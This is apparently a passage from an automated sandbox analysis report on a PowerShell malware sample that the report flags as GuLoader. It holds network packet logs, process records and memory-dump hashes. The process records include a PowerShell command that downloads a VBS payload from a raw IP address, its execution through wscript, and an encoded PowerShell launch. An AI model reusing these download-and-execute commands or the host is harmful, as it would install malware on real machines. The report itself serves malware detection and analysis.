                  May 10, 2022 18:44:40.533466101 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.533489943 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.533514977 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.533529043 CEST  49728  80  192.168.2.4  46.4.198.55
                  May 10, 2022 18:44:40.533540010 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.533564091 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.533588886 CEST  49728  80  192.168.2.4  46.4.198.55
                  May 10, 2022 18:44:40.533590078 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.533598900 CEST  49728  80  192.168.2.4  46.4.198.55
                  May 10, 2022 18:44:40.533615112 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.533628941 CEST  49728  80  192.168.2.4  46.4.198.55
                  May 10, 2022 18:44:40.533639908 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.533664942 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.533674002 CEST  49728  80  192.168.2.4  46.4.198.55
                  May 10, 2022 18:44:40.533690929 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.533713102 CEST  49728  80  192.168.2.4  46.4.198.55
                  May 10, 2022 18:44:40.533715010 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.533737898 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.533765078 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.533780098 CEST  49728  80  192.168.2.4  46.4.198.55
                  May 10, 2022 18:44:40.533791065 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.533811092 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.533834934 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.533845901 CEST  49728  80  192.168.2.4  46.4.198.55
                  May 10, 2022 18:44:40.533859015 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.533875942 CEST  49728  80  192.168.2.4  46.4.198.55
                  May 10, 2022 18:44:40.533883095 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.533905029 CEST  49728  80  192.168.2.4  46.4.198.55
                  May 10, 2022 18:44:40.533906937 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.533931971 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.533953905 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.533966064 CEST  49728  80  192.168.2.4  46.4.198.55
                  May 10, 2022 18:44:40.533979893 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.534003019 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.534025908 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.534044981 CEST  49728  80  192.168.2.4  46.4.198.55
                  May 10, 2022 18:44:40.534049988 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.534079075 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.534101963 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.534105062 CEST  49728  80  192.168.2.4  46.4.198.55
                  May 10, 2022 18:44:40.534113884 CEST  49728  80  192.168.2.4  46.4.198.55
                  May 10, 2022 18:44:40.534126043 CEST  80  49728  46.4.198.55  192.168.2.4
                  May 10, 2022 18:44:40.534143925 CEST  49728  80  192.168.2.4  46.4.198.55
                  May 10, 2022 18:44:40.534149885 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.534173965 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.534198046 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.534199953 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.534220934 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.534241915 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.534244061 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.534267902 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.534286976 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.534291029 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.534315109 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.534336090 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.534337044 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.534360886 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.534383059 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.534384012 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.534404993 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.534427881 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.534451008 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.534451008 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.534476042 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.534486055 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.534502029 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.534518003 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.534524918 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.534616947 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.541693926 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.557698011 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.557746887 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.557776928 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.557807922 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.557835102 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.557852983 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.557862043 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.557888031 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.557889938 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.557899952 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.557919979 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.557946920 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.557975054 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.557986975 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.558001041 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.558013916 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.558029890 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.558057070 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.558073997 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.558083057 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.558110952 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.558131933 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.558137894 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.558166981 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.558177948 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.558195114 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.558222055 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.558233976 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.558249950 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.558278084 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.558290005 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.558304071 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.558331966 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.558343887 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.558357954 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.558386087 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.558396101 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.558413982 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.558440924 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.558469057 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.558473110 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.558501959 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.558516979 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.558528900 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.558557034 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.558566093 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.564820051 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.564861059 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.564889908 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.564918041 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.564932108 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.564946890 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.564960003 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.564977884 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.564997911 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.565006971 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.565036058 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.565057039 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.565062046 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.565090895 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.565107107 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.565119028 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.565145969 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.565161943 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.565175056 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.565202951 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.565218925 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.565231085 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.565270901 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.565274954 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.565303087 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.565346956 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.569076061 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.592300892 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.592350006 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.592385054 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.592422009 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.592434883 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.592459917 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.592494965 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.592525959 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.592566967 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.592575073 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.592605114 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.592641115 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.592645884 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.592684031 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.592719078 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.592720985 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.592757940 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.592792988 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.592793941 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.592829943 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.592866898 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.592886925 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.592905998 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.592941999 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.592959881 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.592978954 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.593015909 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.593018055 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.593053102 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.593089104 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.593091011 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.685365915 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.699480057 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:42.507947922 CEST4972880192.168.2.446.4.198.55
                  • 46.4.198.55
                  Session ID: 0
                  Source IP: 192.168.2.4
                  Source Port: 49728
                  Destination IP: 46.4.198.55
                  Destination Port: 80
                  Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                  Timestamp: May 10, 2022 18:44:40.413928032 CEST
                  kBytes transferred: 218
                  Direction: OUT
                  Data:
                  GET /10P/Sursdepa.vbs HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
                  Host: 46.4.198.55
                  Connection: Keep-Alive

                  Timestamp: May 10, 2022 18:44:40.438344955 CEST
                  kBytes transferred: 220
                  Direction: IN
                  Data:
                  HTTP/1.1 200 OK
                  Date: Tue, 10 May 2022 16:44:39 GMT
                  Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.28
                  Last-Modified: Tue, 10 May 2022 10:15:23 GMT
                  ETag: "39b46-5dea59a4f4c1a"
                  Accept-Ranges: bytes
                  Content-Length: 236358
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Target ID:1
                  Start time:18:44:30
                  Start date:10/05/2022
                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\book.ps1
                  Imagebase:0x7ff6ba650000
                  File size:447488 bytes
                  MD5 hash:95000560239032BC68B4C2FDFCDEF913
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET
                  Reputation:high

                  Target ID:2
                  Start time:18:44:30
                  Start date:10/05/2022
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff647620000
                  File size:625664 bytes
                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Target ID:3
                  Start time:18:44:34
                  Start date:10/05/2022
                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-WebRequest -uri http://46.4.198.55/10P/Sursdepa.vbs -o Sursdepa.vbs
                  Imagebase:0x7ff6ba650000
                  File size:447488 bytes
                  MD5 hash:95000560239032BC68B4C2FDFCDEF913
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET
                  Reputation:high

                  Target ID:11
                  Start time:18:44:55
                  Start date:10/05/2022
                  Path:C:\Windows\System32\wscript.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Sursdepa.vbs"
                  Imagebase:0x7ff6e4820000
                  File size:163840 bytes
                  MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Target ID:14
                  Start time:18:45:16
                  Start date:10/05/2022
                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WindowspowerShell\v1.0\powershell.exe" -EncodedCommand "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
                  Imagebase:0xb70000
                  File size:430592 bytes
                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET
                  Yara matches:
                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000E.00000002.544284081.0000000009290000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:high

                  Target ID:15
                  Start time:18:45:16
                  Start date:10/05/2022
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff647620000
                  File size:625664 bytes
                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Target ID:18
                  Start time:18:45:56
                  Start date:10/05/2022
                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xtg032l3\xtg032l3.cmdline
                  Imagebase:0x30000
                  File size:2170976 bytes
                  MD5 hash:350C52F71BDED7B99668585C15D70EEA
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET
                  Reputation:moderate

                  Target ID:19
                  Start time:18:45:59
                  Start date:10/05/2022
                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5295.tmp" "c:\Users\user\AppData\Local\Temp\xtg032l3\CSC5582155B3987404B8B25346C869765C.TMP"
                  Imagebase:0x1230000
                  File size:43176 bytes
                  MD5 hash:C09985AE74F0882F208D75DE27770DFA
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate

                    • Opcode Fuzzy Hash: fcc69ba2726b45e447befc2a6b497216fab5be38881b0102f73ee1c3adaa9624
                    • Instruction Fuzzy Hash: EB31B63291CB894FD349DB14D4515AABBE5FF85320F0406BBE489C73A2DA38A945C7C2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000003.00000002.301290087.00007FFF7F010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7F010000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_7fff7f010000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c77019f54d51d50a7da08af708998f1d891624b57d0045a7a00b50aa4ea0557a
                    • Instruction ID: 0f90bc35966678d5dbd453914f4e5b7cf57e433eedaf292958953f1e485869b7
                    • Opcode Fuzzy Hash: c77019f54d51d50a7da08af708998f1d891624b57d0045a7a00b50aa4ea0557a
                    • Instruction Fuzzy Hash: 5C01677111CB0C4FD748EF0CE451AAAB7E0FB95364F10056EE58AC3691DA36E882CB45
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 0000000E.00000002.542453654.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7b00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8a2ae1b1e5ebbca52123c28f74f510c2ab892645b5a945963cba280be920ebba
                    • Instruction ID: 1deaad611e22c5ea613b1fae43eb39ddeccb566b972d44612dbc1524179dd827
                    • Opcode Fuzzy Hash: 8a2ae1b1e5ebbca52123c28f74f510c2ab892645b5a945963cba280be920ebba
                    • Instruction Fuzzy Hash: 1E526DB0600219DFDB24DF24C850BAEB7B2EF89304F1585A9E909AB790DB35ED45CF91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 0000000E.00000002.542194732.0000000007A10000.00000040.00000001.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7a10000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d5c61e827309c7cbe17ba23a1b070cb57df8ff56cf37ed4845c6438605c5d24d
                    • Instruction ID: 71426056c7e4e21b48a0ccfe824de0538c0a000fdd5bc00a1c824c145d587048
                    • Opcode Fuzzy Hash: d5c61e827309c7cbe17ba23a1b070cb57df8ff56cf37ed4845c6438605c5d24d
                    • Instruction Fuzzy Hash: 3BB1D2B0B05241DFEB28EB74981867E7BE7AFC9200B148469D51ACB395DF35DC02CB92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 0000000E.00000002.542194732.0000000007A10000.00000040.00000001.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7a10000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 941fd63982b330b5757969b7c8fe1e218f564114df6c5eefd9f4ca480d2144db
                    • Instruction ID: d6352aa81827816329ab833b739a2da551d709d0315aef72a463d7d32dff4a35
                    • Opcode Fuzzy Hash: 941fd63982b330b5757969b7c8fe1e218f564114df6c5eefd9f4ca480d2144db
                    • Instruction Fuzzy Hash: 60A181B45147018BE720EB64D584A6A77A7EBC2324F20CB1CE17A8B7D0DF74B8468F91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 0000000E.00000002.542194732.0000000007A10000.00000040.00000001.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7a10000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9e5d80e1da23b3219faf44aa0d3e1cc46dd2d71d4d6885f6505170bfb5df8787
                    • Instruction ID: d2a491c8637dc6f4732f0582edec02d8bf372a69a3e34558c4e1a290976288b9
                    • Opcode Fuzzy Hash: 9e5d80e1da23b3219faf44aa0d3e1cc46dd2d71d4d6885f6505170bfb5df8787
                    • Instruction Fuzzy Hash: 95A18FB45147018BE720EB64D584A7A77A6EBC2324F20CB1CE17A8B7D0DF74B8468F91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 0000000E.00000002.542453654.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7b00000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ff6e9faa950d4e453c76cfe74598c1a46bd6d8091a29910beb9d313f3369f860
                    • Instruction ID: 821b8e729368b0ab5b2933d4616afda04db0e9f6ae3c46dc29c07586890c47cf
                    • Opcode Fuzzy Hash: ff6e9faa950d4e453c76cfe74598c1a46bd6d8091a29910beb9d313f3369f860
                    • Instruction Fuzzy Hash: 69913CB1A01215CFEB24DF65D844BAEBBB2FF88314F1581A9D509A7290DF34AD45CFA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 0000000E.00000002.542194732.0000000007A10000.00000040.00000001.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7a10000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e4eed10eda3cb29793f2d0a12fe2a9a88ae01533e6e67f217ea8e531597322cc
                    • Instruction ID: 545d3ead3d2eb9ea6111a4fe1b6af22058d2248cdb6842f62a15a09129313729
                    • Opcode Fuzzy Hash: e4eed10eda3cb29793f2d0a12fe2a9a88ae01533e6e67f217ea8e531597322cc
                    • Instruction Fuzzy Hash: 96818E74B042148FEB18DFB8D854AAEBBF2EFC9211F158569D812A7390DB34DC45CBA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 0000000E.00000002.542194732.0000000007A10000.00000040.00000001.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7a10000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 04918b58eefa9aaba0cfa9b102b84011527a23da6d2a0fd4d640fd9a7ead1188
                    • Instruction ID: 104c791539b959f9d8a5c35af0db614ea97946f77997305fd82054f9d8675ac9
                    • Opcode Fuzzy Hash: 04918b58eefa9aaba0cfa9b102b84011527a23da6d2a0fd4d640fd9a7ead1188
                    • Instruction Fuzzy Hash: 2F7179B4A00209CFDB14DF59C484AAEBBF2EF88324F55D469D819AB351DB30AC45CFA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 0000000E.00000002.542194732.0000000007A10000.00000040.00000001.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7a10000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ad0d197b42c71bbdc00d876f33468ce09e82d7773f6630b7c69a92766063514f
                    • Instruction ID: bc6292ee0a9d419c45f4151519ec3caaa58163dba8b531104226cae0492ead47
                    • Opcode Fuzzy Hash: ad0d197b42c71bbdc00d876f33468ce09e82d7773f6630b7c69a92766063514f
                    • Instruction Fuzzy Hash: CA616874A042589FDB14DFA8D89099DBBF2BF89304F1581A9E405AB761DB31EC01CF91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 0000000E.00000002.542194732.0000000007A10000.00000040.00000001.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7a10000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c75775af40cd842436be1406269268c093d5b6a6c5e59237449c17c4616abf81
                    • Instruction ID: 87343dba564fc08e6f7e98a654619a3a6efbd9fd721c36e99ef61cc671ef5c97
                    • Opcode Fuzzy Hash: c75775af40cd842436be1406269268c093d5b6a6c5e59237449c17c4616abf81
                    • Instruction Fuzzy Hash: 1A41C37070C246CFEB249B34D99863A7BEABFC4216B54047ED427C7691DB78D845CB41
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 0000000E.00000002.542194732.0000000007A10000.00000040.00000001.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_7a10000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d4162292e59a86d6358a0c8f99cfe7475b2a24d22a32902cf31801bfd9289bbb
                    • Instruction ID: 1f34f476cf2cc0dd593cda2a1fd1cb38e5b2a7b86cbe88b96b31b1ee2223c712
                    • Opcode Fuzzy Hash: d4162292e59a86d6358a0c8f99cfe7475b2a24d22a32902cf31801bfd9289bbb
                    • Instruction Fuzzy Hash: DD416AB4E002158FEB14DFB9D844AEDBBF2AF89304F158569D821A7390DB34E844CF61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 0000000E.00000002.542194732.0000000007A10000.00000040.00000001.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                    Joe Sandbox IDA Plugin
